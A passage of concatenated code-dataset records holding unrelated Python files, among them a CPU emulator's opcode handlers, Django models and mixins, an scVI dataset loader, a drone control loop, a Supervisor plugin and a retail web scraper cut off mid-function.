calls in case they are true\n # if they're false, the PC needs to be incremented.\n else:\n self.pc += 2\n\ndef handle_JGT(self, operand, *args):\n # if the second last position is true, this will return true\n if self.FL & 0b00000010:\n self.pc = self.reg[operand]\n else:\n self.pc += 2\n\ndef handle_JLE(self, operand, *args):\n if self.FL & 0b00000110:\n self.pc = self.reg[operand]\n else:\n 
self.pc += 2\n\ndef handle_JLT(self, operand, *args):\n if self.FL & 0b00001000:\n self.pc = self.reg[operand]\n else:\n self.pc += 2\n\ndef handle_JMP(self, operand, *args):\n # Move the pc forward, regardless\n # This call is ignored by the run method.\n self.pc = self.reg[operand]\n\ndef handle_JNE(self, operand, *args):\n # Only jump if E = 0\n if not self.FL & 0b00000001:\n self.pc = self.reg[operand]\n else: \n self.pc += 2\n\ndef handle_LD(self, operand_a, operand_b):\n self.reg[operand_a] = self.ram[self.reg[operand_b]]\n\ndef handle_NOP(self, *args):\n pass\n\ndef handle_PRA(self, operand, *args):\n # get the value at the indicated reg\n letter = self.reg[operand]\n # convert it to a letter and print\n print(chr(letter))\n\ndef handle_ST(self, operand_a, operand_b):\n # write to memory; reg_b goes to address in reg_a\n # self.ram_write(address, value)\n self.ram_write(self.reg[operand_a], self.reg[operand_b])\n\nmain_branch = {\n HLT : handle_HLT,\n LDI : handle_LDI,\n PRN : handle_PRN,\n PUSH : handle_PUSH,\n POP : handle_POP,\n CALL : handle_CALL,\n RET : handle_RET,\n INT : handle_INT,\n IRET : handle_IRET,\n JEQ: handle_JEQ,\n JGE: handle_JGE,\n JGT: handle_JGT,\n JLE: handle_JLE,\n JLT: handle_JLT,\n JMP: handle_JMP,\n JNE: handle_JNE,\n LD: handle_LD,\n NOP: handle_NOP,\n PRA: handle_PRA,\n ST: handle_ST,\n}","sub_path":"ls8/main_ops.py","file_name":"main_ops.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"204504128","text":"#!/usr/bin/python\n\"\"\"postprocess\"\"\"\n\nimport argparse\nimport ruamel.yaml\n\n\ndef read(filename):\n \"\"\"return file contents\"\"\"\n\n with open(filename, 'r') as file_in:\n return file_in.read()\n\n\ndef write(filename, cwl):\n \"\"\"write to file\"\"\"\n\n with open(filename, 'w') as file_out:\n file_out.write(cwl)\n\n\ndef main():\n \"\"\"main function\"\"\"\n\n parser = argparse.ArgumentParser(description='postprocess')\n\n parser.add_argument(\n '-f',\n action=\"store\",\n dest=\"filename_cwl\",\n help='Name of the cwl file',\n required=True\n )\n\n params = parser.parse_args()\n\n cwl = ruamel.yaml.load(read(params.filename_cwl),\n ruamel.yaml.RoundTripLoader)\n\n# 1) we're doing this way to preserve the order\n# can't figure out other ways.\n# 2) the prefix --in param must be set up this way to have\n# ABRA output --in multiple times\n input_file_type = \"\"\"\ntype: array\nitems: File\n\"\"\"\n cwl['inputs']['in']['type'] = ruamel.yaml.load(input_file_type, ruamel.yaml.RoundTripLoader)\n cwl['inputs']['in']['inputBinding'].insert(0, 'itemSeparator', ',')\n cwl['inputs']['in']['secondaryFiles'] = ['^.bai']\n cwl['inputs']['targets']['type'].insert(1, 'File')\n input_out_type = \"\"\"\ntype: array\nitems: string\n\"\"\"\n cwl['inputs']['out']['type'] = ruamel.yaml.load(input_out_type, ruamel.yaml.RoundTripLoader)\n cwl['inputs']['out']['inputBinding'].insert(0, 'itemSeparator', ',')\n cwl['inputs']['threads']['default'] = '15'\n del cwl['inputs']['version']\n del cwl['inputs']['java_version']\n\n write(params.filename_cwl, ruamel.yaml.dump(\n cwl, Dumper=ruamel.yaml.RoundTripDumper))\n\n\nif __name__ == \"__main__\":\n\n main()\n","sub_path":"build/cwl-wrappers/cmo-abra/0.92/postprocess.py","file_name":"postprocess.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"6013825","text":"from django.core.urlresolvers import reverse_lazy\n\nfrom 
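Editor's note: the comparison masks in the CPU-ops record look inconsistent with the `0b00000LGE` flag layout that `handle_JEQ` (bit 0 = equal) and `handle_JGT` (bit 1 = greater) imply: `handle_JLE` tests `0b110` (less OR greater) and `handle_JLT` tests bit 3, which nothing in this instruction set appears to set. Assuming that LS-8 layout, corrected handlers would read:

```python
def handle_JLE(self, operand, *args):
    if self.FL & 0b00000101:      # jump if less-than OR equal
        self.pc = self.reg[operand]
    else:
        self.pc += 2

def handle_JLT(self, operand, *args):
    if self.FL & 0b00000100:      # bit 2 is the less-than flag
        self.pc = self.reg[operand]
    else:
        self.pc += 2
```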
.models import Aluno, Professor, Horario, Turma, \\\n DiasInuteis, Item\nfrom .forms import AlunoForm, ProfessorForm, HorarioForm, \\\n TurmaForm, DiasInuteisForm, ItemForm\n\n\nBASE_FORM_ALUNO = 'form/aluno_form.html'\nBASE_FORM_PROFESSOR = 'form/professor_form.html'\nBASE_FORM_TURMA = 'form/turma_form.html'\nBASE_FORM_HORARIO = 'form/horario_form.html'\nBASE_FORM_DIAS_INUTEIS = 'form/dias_inuteis_form.html'\nBASE_FORM_ITEM = 'form/item_form.html'\n\n\nclass AlunoViewMixin(object):\n\n model = Aluno\n form_class = AlunoForm\n success_url = reverse_lazy('register:aluno:list')\n\n def get_context_data(self, **kwargs):\n context = super(AlunoViewMixin, self).get_context_data(**kwargs)\n context['template_extends'] = BASE_FORM_ALUNO\n context['form_disabled'] = False\n context['register_class'] = \"Cadastros\"\n context['register_name'] = \"Aluno\"\n\n return context\n\n\nclass ProfessorViewMixin(object):\n\n model = Professor\n form_class = ProfessorForm\n success_url = reverse_lazy('register:professor:list')\n\n def get_context_data(self, **kwargs):\n context = super(ProfessorViewMixin, self).get_context_data(**kwargs)\n context['template_extends'] = BASE_FORM_PROFESSOR\n context['form_disabled'] = False\n context['register_class'] = \"Cadastros\"\n context['register_name'] = \"Professor\"\n\n return context\n\n\nclass HorarioViewMixin(object):\n\n model = Horario\n form_class = HorarioForm\n success_url = reverse_lazy('register:horario:list')\n\n def get_context_data(self, **kwargs):\n context = super(HorarioViewMixin, self).get_context_data(**kwargs)\n context['template_extends'] = BASE_FORM_HORARIO\n context['form_disabled'] = False\n context['register_class'] = \"Cadastros\"\n context['register_name'] = \"Horario\"\n\n return context\n\n\nclass TurmaViewMixin(object):\n\n model = Turma\n form_class = TurmaForm\n success_url = reverse_lazy('register:turma:list')\n\n def get_context_data(self, **kwargs):\n context = super(TurmaViewMixin, self).get_context_data(**kwargs)\n context['template_extends'] = BASE_FORM_TURMA\n context['form_disabled'] = False\n context['register_class'] = \"Cadastros\"\n context['register_name'] = \"Turma\"\n context['itens'] = Item.objects.all()\n\n return context\n\n\nclass DiasInuteisViewMixin(object):\n\n model = DiasInuteis\n form_class = DiasInuteisForm\n success_url = reverse_lazy('register:dias_inuteis:list')\n\n def get_context_data(self, **kwargs):\n context = super(DiasInuteisViewMixin, self).get_context_data(**kwargs)\n context['template_extends'] = BASE_FORM_DIAS_INUTEIS\n context['form_disabled'] = False\n context['register_class'] = \"Cadastros\"\n context['register_name'] = \"Dias Inuteis\"\n\n return context\n\n\nclass ItemViewMixin(object):\n\n model = Item\n form_class = ItemForm\n success_url = reverse_lazy('register:item:list')\n\n def get_context_data(self, **kwargs):\n context = super(ItemViewMixin, self).get_context_data(**kwargs)\n context['template_extends'] = BASE_FORM_ITEM\n context['form_disabled'] = False\n context['register_class'] = \"Cadastros\"\n context['register_name'] = \"Item\"\n\n return context","sub_path":"onda_esportiva/register/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"443114030","text":"import json\nimport shutil\nfrom pathlib import Path\n\nfrom notebook.base.handlers import IPythonHandler\nfrom notebook.utils import url_path_join\nfrom simcore_sdk import node_ports\n\n\nasync def 
retrieve_data():\n print(\"retrieving data...\")\n PORTS = node_ports.ports()\n\n inputs_path = Path(\"~/home\").expanduser()\n inputs_path.mkdir(exist_ok=True)\n\n values = {}\n for node_input in PORTS.inputs: \n if not node_input or node_input.value is None:\n continue\n print(\"getting data from port '{}' with value '{}'...\".format(node_input.key, node_input.value))\n value = await node_input.get()\n values[node_input.key] = {\"type\": node_input.type, \"value\": value}\n\n if \"data:\" in node_input.type:\n dest = inputs_path / node_input.key\n dest.mkdir(exist_ok=True, parents=True)\n dest = dest / Path(value).name\n shutil.move(value, dest)\n values[node_input.key] = {\"type\": node_input.type, \"value\": str(dest)}\n\n values_file = inputs_path / \"values.json\"\n with values_file.open('w') as fp:\n json.dump(values, fp)\n\nclass HelloWorldHandler(IPythonHandler):\n async def get(self):\n await retrieve_data()\n self.finish('Hello, world!')\n\ndef load_jupyter_server_extension(nb_server_app):\n \"\"\"\n Called when the extension is loaded.\n Args:\n nb_server_app (NotebookWebApplication): handle to the Notebook webserver instance.\n \"\"\"\n web_app = nb_server_app.web_app\n host_pattern = '.*$'\n route_pattern = url_path_join(web_app.settings['base_url'], '/retrieve')\n \n web_app.add_handlers(host_pattern, [(route_pattern, HelloWorldHandler)])\n ","sub_path":"Dockerfile_notebook_only/input_retriever.py","file_name":"input_retriever.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"38664875","text":"\ndef reverse(word):\n new_string = []\n index = len(word)\n # word_arr = list(word)\n\n while index:\n index -= 1\n new_string.append(word[index])\n return new_string\n\nword = input('input a string :')\nprint(reverse(word))\n","sub_path":"mix_function/reverse_string.py","file_name":"reverse_string.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"371336618","text":"import numpy as np\nfrom convolution_step import conv_single_step\n\n\nnp.random.seed(1)\na_slice_prev = np.random.randn(4, 4, 3)\nW = np.random.randn(4, 4, 3)\nb = np.random.randn(1, 1, 1)\n\nZ = conv_single_step(a_slice_prev, W, b)\nprint(\"Z =\", Z)\n\nassert (type(Z) == np.float64 or type(Z) == np.float32), \"You must cast the output to float\"\nassert np.isclose(Z, -6.999089450680221), \"Wrong value\"\n","sub_path":"machine-learning/coursera/deep-learning-specialization/course4/week1/assigment/cnn_from_scratch/convolution_step_test.py","file_name":"convolution_step_test.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"312820504","text":"#!/usr/bin/env python\n\nfrom setuptools import setup, find_packages\nimport branch_io\n\nwith open(\"requirements.txt\") as infile:\n requires = list(map(lambda x: x.strip(), infile.readlines()))\n\nsetup_options = dict(\n name='branch-client',\n version=branch_io.__version__,\n description='Python client for branch.io.',\n long_description='Python client for branch.io.',\n author='Upside Services, Inc',\n url='https://github.com/upside-services/branch-io-clients',\n scripts=[],\n packages=find_packages(exclude=['tests*']),\n 
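Editor's note: `reverse` in the string record above returns a list of characters, not a string; joining, or simply slicing, finishes the job:

```python
def reverse(word):
    return word[::-1]            # or: ''.join(reversed(word))

assert reverse('hello') == 'olleh'
```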
install_requires=requires\n)\n\nsetup(**setup_options)","sub_path":"python-client/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"85511096","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom datetime import date\nfrom smart_selects.db_fields import ChainedForeignKey\nfrom localflavor.ar import ar_provinces\n\n\nPHONE_TYPE = (\n    ('C', 'Celular'),\n    ('F', 'Fijo'),\n    ('W', 'Trabajo'),\n    )\n\n\nclass Client(models.Model):\n    firstname = models.CharField(max_length=200, verbose_name='nombre')\n    lastname = models.CharField(max_length=200, null=True, blank=True, verbose_name='apellido')\n    email = models.EmailField(max_length=200, null=True, blank=True, verbose_name='email')\n\n    def __unicode__(self):\n        return \"%s %s\" % (self.firstname, self.lastname)\n\n    class Meta:\n        verbose_name = 'cliente'\n\n\nclass Address(models.Model):\n    address = models.CharField(max_length=200, verbose_name='calle y número')\n    city = models.CharField(max_length=200, verbose_name='ciudad')\n    state = models.CharField(max_length=1, choices=ar_provinces.PROVINCE_CHOICES, verbose_name='provincia')\n    client = models.ForeignKey(Client)\n\n    def __unicode__(self):\n        return \"%s, %s, %s\" % (self.address, self.city, self.state)\n\n    class Meta:\n        verbose_name = 'dirección'\n        verbose_name_plural = 'direcciones'\n\n\nclass PhoneNumber(models.Model):\n    number = models.CharField(max_length=200, verbose_name='número')\n    number_type = models.CharField(max_length=1, choices=PHONE_TYPE, verbose_name='tipo')\n    client = models.ForeignKey(Client)\n\n    class Meta:\n        verbose_name = 'número de teléfono'\n        verbose_name_plural = 'números de teléfono'\n\n\nclass Specie(models.Model):\n    name = models.CharField(max_length=200, verbose_name='nombre')\n\n    def __unicode__(self):\n        return self.name\n\n    class Meta:\n        verbose_name = 'especie'\n\n\nclass Breed(models.Model):\n    name = models.CharField(max_length=200, verbose_name='nombre')\n    specie = models.ForeignKey(Specie)\n\n    def __unicode__(self):\n        return self.name\n\n    class Meta:\n        verbose_name = 'raza'\n\n\nclass Gender(models.Model):\n    name = models.CharField(max_length=200, verbose_name='nombre')\n\n    def __unicode__(self):\n        return self.name\n\n    class Meta:\n        verbose_name = 'sexo'\n\n\nclass Patient(models.Model):\n    name = models.CharField(max_length=200, verbose_name='nombre')\n    owner = models.ForeignKey(Client, verbose_name='dueño')\n    specie = models.ForeignKey(Specie, null=True, verbose_name='especie')\n    breed = ChainedForeignKey(Breed, null=True, chained_field=\"specie\", chained_model_field=\"specie\", \n            show_all=False, auto_choose=True, verbose_name='raza')\n    gender = models.ForeignKey(Gender, null=True, verbose_name='sexo')\n    birthday = models.DateField(null=True, verbose_name='fecha de nacimiento')\n    identifier = models.CharField(null=True, blank=True, max_length=200, verbose_name='identificador')\n    initial_anamnesis = models.TextField(null=True, blank=True, verbose_name='anamnesis')\n\n    def age(self):\n        today = date.today()\n        return today.year - self.birthday.year - ((today.month, today.day) < (self.birthday.month, self.birthday.day))\n\n    def __unicode__(self):\n        return self.name\n\n    class Meta:\n        verbose_name = 'paciente'\n\n\nclass MedicalRecord(models.Model):\n    date = models.DateField(default=date.today, verbose_name='fecha')\n    patient = models.ForeignKey(Patient)\n    anamnesis = models.TextField(null=True, blank=True, verbose_name='anamnesis')\n    
exam = models.TextField(null=True, blank=True, verbose_name='examen')\n    diagnostic = models.TextField(null=True, blank=True, verbose_name='diagnóstico')\n    ttd = models.TextField(null=True, blank=True, verbose_name='ttd')\n\n    class Meta:\n        verbose_name = 'historia clínica'\n","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"388294084","text":"import os\nimport logging\nfrom pathlib import Path\nfrom zipfile import ZipFile\n\nimport numpy as np\nimport pandas as pd\n\nfrom scvi.dataset.dataset import DownloadableDataset\n\nlogger = logging.getLogger(__name__)\n\n\nclass HematoDataset(DownloadableDataset):\n    \"\"\"Loads the hemato dataset.\n\n    This dataset contains continuous gene expression variations from hematopoietic progenitor cells [31]; it contains\n    4,016 cells and 7,397 genes. We removed the library basal-bm1, which was of poor quality, based on the authors'\n    recommendation. We use their population balance analysis result as a potential function for differentiation.\n\n    Examples:\n        >>> gene_dataset = HematoDataset()\n    \"\"\"\n\n    def __init__(\n        self, save_path: str = \"data/HEMATO/\", delayed_populating: bool = False\n    ):\n        self.gene_names_filename = \"bBM.filtered_gene_list.paper.txt\"\n        self.spring_and_pba_filename = \"bBM.spring_and_pba.csv\"\n        self.cell_types_levels = [\n            \"Erythroid\",\n            \"Granulocytic Neutrophil\",\n            \"Lymphocytic\",\n            \"Dendritic\",\n            \"Megakaryocytic\",\n            \"Monocytic\",\n            \"Basophilic\",\n        ]\n        super().__init__(\n            urls=[\n                \"https://www.ncbi.nlm.nih.gov/geo/download/?acc=GSM2388072&format=file&\"\n                \"file=GSM2388072%5Fbasal%5Fbone%5Fmarrow%2Eraw%5Fumifm%5Fcounts%2Ecsv%2Egz\",\n                \"https://github.com/romain-lopez/scVI-reproducibility/raw/master/additional/data.zip\",\n            ],\n            filenames=[\"bBM.raw_umifm_counts.csv.gz\", \"data.zip\"],\n            save_path=save_path,\n            delayed_populating=delayed_populating,\n        )\n\n    def populate(self):\n        logger.info(\"Preprocessing Hemato data\")\n\n        if len(os.listdir(self.save_path)) == 2:  # nothing extracted yet\n            with ZipFile(os.path.join(self.save_path, \"data.zip\"), \"r\") as zip:\n                zip.extractall(path=Path(self.save_path).parent)\n        raw_counts = pd.read_csv(\n            os.path.join(self.save_path, self.filenames[0]), compression=\"gzip\"\n        )\n\n        # remove this library to avoid dealing with batch effects\n        raw_counts.drop(\n            raw_counts.index[raw_counts[\"library_id\"] == \"basal_bm1\"], inplace=True\n        )\n\n        spring_and_pba = pd.read_csv(\n            os.path.join(self.save_path, self.spring_and_pba_filename)\n        )\n        gene_names = np.loadtxt(\n            os.path.join(self.save_path, self.gene_names_filename), dtype=np.str\n        )\n\n        data = raw_counts.merge(spring_and_pba, how=\"inner\")\n        expression_data = data[gene_names]\n        x_spring = data[\"x_spring\"].values\n        y_spring = data[\"y_spring\"].values\n\n        self.meta = data[\n            [\"Potential\", \"Pr_Er\", \"Pr_Gr\", \"Pr_Ly\", \"Pr_DC\", \"Pr_Mk\", \"Pr_Mo\", \"Pr_Ba\"]\n        ]\n\n        def logit(p):\n            p = np.copy(p.values)\n            p[p == 0] = np.min(p[p > 0])\n            p[p == 1] = np.max(p[p < 1])\n            return np.log(p / (1 - p))\n\n        labels = logit(self.meta.iloc[:, 2]) - logit(self.meta.iloc[:, 1])\n        expression_data = expression_data.values\n\n        logger.info(\"Finished preprocessing Hemato data\")\n        self.populate_from_data(\n            X=expression_data,\n            labels=labels,\n            gene_names=gene_names,\n            cell_attributes_dict={\"x_coord\": x_spring, \"y_coord\": y_spring},\n        )\n        
self.filter_cells_by_count()\n","sub_path":"scvi/dataset/hemato.py","file_name":"hemato.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"210065229","text":"#!/usr/bin/python3\r\n\r\n# Copyright (C) 2017 Masahiro Tsuji\r\n#\r\n# This file is part of PyDrone.\r\n#\r\n# PyDrone is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# PyDrone is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with PyDrone. If not, see <http://www.gnu.org/licenses/>.\r\n#\r\n\r\nfrom optparse import OptionParser, OptionValueError\r\n\r\n# sudo pip3 install pyyaml\r\nimport yaml\r\nimport math\r\nimport time\r\n\r\nfrom debug_tools.attitude_log import AttitudeLog\r\nfrom thrust.thrust import Thrust\r\nfrom sensor.sensor import Sensor\r\nfrom pilot.pilot import Pilot\r\nfrom controller.controller import Controller\r\nfrom time_log import TimeLog\r\nfrom led_pyzero import Led\r\n\r\ndef main_loop(conf_file, log_path, controll_method):\r\n    Led.change(False)\r\n    pilot = Pilot(controll_method)\r\n    print(\"Ready\")\r\n    cmd = Pilot.CMD_NOP\r\n    while True:\r\n        last_cmd = cmd\r\n        cmd = pilot.get_cmd()\r\n        if cmd == Pilot.CMD_NOP:\r\n            pass\r\n        elif last_cmd == Pilot.CMD_NOP and cmd == Pilot.CMD_THROTTLE_ZERO:\r\n            # start\r\n            try:\r\n                params = yaml.load(open(conf_file, \"rt\"))\r\n            except:\r\n                print(\"ERROR can not read conf file\")\r\n                raise\r\n            if log_path is not None:\r\n                # overwrite log_path if --log option is specified\r\n                params[\"log\"][\"path\"] = log_path\r\n            sensor = Sensor()\r\n            dt = sensor.sampling_interval()\r\n            controller = Controller(dt=dt,**params[\"controller\"])\r\n            print(\"ctrl start\")\r\n            pilot.initialize()\r\n            alog = AttitudeLog(**params[\"log\"])\r\n            Led.change(True)\r\n            with Thrust(params[\"body_const\"]) as thrust:\r\n                control_loop(pilot, sensor, controller, thrust, alog)\r\n            print(\"ctrl end\")\r\n            Led.change(False)\r\n            alog.add_info('param', params)\r\n            alog.save() \r\n            print(\"save end\")\r\n            time.sleep(0.5) \r\n        Led.toggle()\r\n\r\n\r\n    \r\ndef throttle_correction(throttle_in, angle):\r\n    DEG_TO_RAD = math.pi/180\r\n    return throttle_in/(math.cos(angle[1] * DEG_TO_RAD) * math.cos(angle[2] * DEG_TO_RAD))\r\n\r\ndef control_loop(pilot, sensor, controller, thrust, alog):\r\n    timelog = TimeLog()\r\n    start_time = None\r\n    startup_done = False\r\n    while True:\r\n        cmd = pilot.get_cmd()\r\n        if cmd==Pilot.CMD_THROTTLE_ZERO:\r\n            if startup_done:\r\n                break\r\n            else:\r\n                startup_done = True\r\n        if cmd==Pilot.CMD_EMERGENCY:\r\n            print(\"EMERGENCY!\")\r\n            break\r\n        timelog.checkpoint_first()\r\n        retrieve_time, angle, angular_velocity, acc = sensor.get()\r\n        timelog.checkpoint(retrieve_time)\r\n        timelog.checkpoint()\r\n        throttle, setpoint = pilot.get_setpoint(angle, angular_velocity, acc)\r\n        throttle_out = throttle_correction(throttle, angle)\r\n        tau = controller.out(angle, angular_velocity, setpoint)\r\n        thrust.set_thrust(throttle_out, tau)\r\n        time_result = timelog.checkpoint(is_last=True)\r\n        if startup_done == False:\r\n            continue\r\n        if start_time is None:\r\n            start_time = 
retrieve_time\r\n        alog.append(time = retrieve_time - start_time,\r\n                    time_log = time_result[:],\r\n                    angle_ypr = list(angle), \r\n                    gyro_ypr = list(angular_velocity),\r\n                    raw_acc = list(acc),\r\n                    out_throttle = throttle_out,\r\n                    out_tau = list(tau),\r\n                    pilot_ypr = list(setpoint),\r\n                    pilot_throttle = throttle) \r\n    thrust.set_thrust(0,[0,0,0]) \r\n\r\n\r\nif __name__ == \"__main__\":\r\n    \"\"\"\r\n    QuadCopter Controller v0.1\r\n    \r\n    \"\"\"\r\n    usage = \"usage: %prog [options] keyword\"\r\n    parser = OptionParser(usage)\r\n    parser.add_option(\r\n        \"--hid\",\r\n        action=\"store_true\", # stores True\r\n        # (store_false would store False)\r\n        default=False,\r\n        help=\"use hid joystick\"\r\n    )\r\n    parser.add_option(\r\n        \"-c\", \"--conf\",\r\n        action=\"store\", type=\"string\", dest=\"conf_file\",\r\n        default=\"pydrone.conf\",\r\n        help=\"configuration file\"\r\n    )\r\n    parser.add_option(\r\n        \"-l\", \"--log\",\r\n        action=\"store\", type=\"string\", dest=\"log_path\",\r\n        default=None,\r\n        help=\"path for log file\"\r\n    )\r\n    (options, args) = parser.parse_args()\r\n\r\n    Led.change(False)\r\n\r\n    if options.hid:\r\n        controll_method=Pilot.METHOD_HID\r\n    else:\r\n        controll_method=Pilot.METHOD_UDP\r\n\r\n    main_loop(options.conf_file, options.log_path, controll_method)\r\n","sub_path":"pydrone.py","file_name":"pydrone.py","file_ext":"py","file_size_in_byte":5128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"250434168","text":"\"\"\"\nCommon core objects\n\"\"\"\nfrom abc import ABC, abstractmethod\nfrom dataclasses import asdict, dataclass\nfrom typing import Any, Dict, Iterator, List\n\n\nclass GitError(Exception):\n    \"\"\"Wrapper exception for Git failures.\"\"\"\n\n\n@dataclass\nclass Commit:\n    \"\"\"Core class representing a commit\"\"\"\n\n    hash: str\n    author_name: str\n    author_mail: str\n    author_date: int\n    commit_name: str\n    commit_mail: str\n    commit_date: int\n    subject: str\n    body: str\n    parents: List[str]\n\n    def asdict(self) -> Dict[str, Any]:\n        return asdict(self)\n\n\nclass GitPort(ABC):\n    \"\"\"Git repository port\"\"\"\n\n    @abstractmethod\n    def list_commits(self) -> Iterator[Commit]:\n        \"\"\"Returns an iterator with all the commits from the repository\"\"\"\n\n    @staticmethod\n    @abstractmethod\n    def valid_url(url: str) -> bool:\n        \"\"\"Must return true only if the instance supports this URL\"\"\"\n","sub_path":"commit_viewer/git/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"98938899","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\n# ======================================================================\n# Copyright 2016 Julien LE CLEACH\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ======================================================================\n\nimport errno\nimport os\n\nfrom supervisor.options import ServerOptions\nfrom supervisor.web import VIEWS\nfrom supervisor.xmlrpc import Faults\n\nfrom 
supvisors.rpcinterface import RPCInterface\nfrom supvisors.viewprocaddress import ProcAddressView\nfrom supvisors.viewhostaddress import HostAddressView\nfrom supvisors.viewapplication import ApplicationView\nfrom supvisors.viewimage import *\nfrom supvisors.viewsupvisors import SupvisorsView\n\n\n# Supvisors related faults\nclass SupvisorsFaults:\n SUPVISORS_CONF_ERROR, BAD_SUPVISORS_STATE, BAD_ADDRESS, BAD_STRATEGY, \\\n BAD_EXTRA_ARGUMENTS = range(5)\n\nFAULTS_OFFSET = 100\n\ndef expand_faults():\n \"\"\" Expand supervisord Fault definition. \"\"\"\n for (x, y) in SupvisorsFaults.__dict__.items():\n if not x.startswith('__'):\n setattr(Faults, x, y + FAULTS_OFFSET)\n\n\ndef update_views():\n \"\"\" Trick to replace Supervisor main page. \"\"\"\n # replace Supervisor main entry\n here = os.path.abspath(os.path.dirname(__file__))\n # set main page\n VIEWS['index.html'] = {'template': os.path.join(here, 'ui/index.html'),\n 'view': SupvisorsView}\n # set address /processpage\n VIEWS['procaddress.html'] = {'template': os.path.join(\n here, 'ui/procaddress.html'),\n 'view': ProcAddressView}\n # set address/host page\n VIEWS['hostaddress.html'] = {'template': os.path.join(\n here, 'ui/hostaddress.html'),\n 'view': HostAddressView}\n # set application page\n VIEWS['application.html'] = {'template': os.path.join(\n here, 'ui/application.html'),\n 'view': ApplicationView}\n # set fake page to export images\n VIEWS['process_cpu.png'] = {'template': os.path.join(\n here, 'ui/empty.html'),\n 'view': ProcessCpuImageView}\n VIEWS['process_mem.png'] = {'template': os.path.join(\n here, 'ui/empty.html'),\n 'view': ProcessMemoryImageView}\n VIEWS['address_cpu.png'] = {'template': os.path.join(\n here, 'ui/empty.html'),\n 'view': AddressCpuImageView}\n VIEWS['address_mem.png'] = {'template': os.path.join(\n here, 'ui/empty.html'),\n 'view': AddressMemoryImageView}\n VIEWS['address_io.png'] = {'template': os.path.join(\n here, 'ui/empty.html'),\n 'view': AddressNetworkImageView}\n\n\ndef cleanup_fds(self):\n \"\"\" This is a patch of the Supervisor cleanup_fds in ServerOptions.\n The default version is a bit rough and closes all file descriptors of\n the process, including the PyZmq ones, which leads to a low-level crash\n in select/poll. \"\"\"\n pid = os.getpid()\n proc_fd = '/proc/{}/fd'.format(pid)\n zmq_inodes = []\n for fd in os.listdir(proc_fd):\n try:\n inode = os.readlink(proc_fd + '/' + fd)\n except OSError as err:\n if err.errno in (errno.ENOENT, errno.ESRCH, errno.EINVAL):\n continue\n else:\n print('[ERROR] unexpected readlink error: {}'.format(err))\n else:\n # check if the inode is a ZMQ\n if inode.startswith('anon_inode:[') or \\\n inode.startswith('socket:['):\n zmq_inodes.append(int(fd))\n # the following is adapted from the original cleanup_fds\n # it just avoids to close the Zmq inodes\n start = 5\n for x in range(start, self.minfds):\n if x not in zmq_inodes:\n try:\n os.close(x)\n except OSError:\n pass\n\n\ndef make_supvisors_rpcinterface(supervisord, **config):\n \"\"\" Supervisor entry point. 
\"\"\"\n # update Supervisor Fault definition\n expand_faults()\n # update Supervisor http web pages\n update_views()\n # patches the Supervisor ServerOptions.cleanup_fds\n ServerOptions.cleanup_fds = cleanup_fds\n # create and return handler\n return RPCInterface(supervisord)\n","sub_path":"supvisors/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"607874293","text":"import bs4 as bs\nimport requests\nimport numpy as np\nimport pandas as pd\nimport re\nimport os\n\n\ndef extractNumber(string_value):\n number = re.findall(r'\\d+', string_value)\n return number\n\n\ndef spider(max_pages):\n page=0\n name = list()\n price = list()\n\n while page < max_pages:\n url = 'http://www.asos.com/men/hoodies-sweatshirts/cat/?cid=5668&nlid=mw|clothing|shop+by+product/page' + str(page+1)\n source_code = requests.get(url).text\n soup = bs.BeautifulSoup(source_code,\"html.parser\")\n\n for link in soup.find_all('a', {'class': '_3x-5VWa'}):\n name.append(link.get('aria-label'))\n\n for link in soup.find_all('span', {'class':'_342BXW_'}):\n data = link.text\n data = data.strip('£')\n price.append(float(data))\n\n page = page +1\n\n name = np.asanyarray(name)\n price = np.asanyarray(price)\n\n data = {'price':price,'title': name}\n dataFrame = pd.DataFrame(data)\n print(dataFrame)\n\n 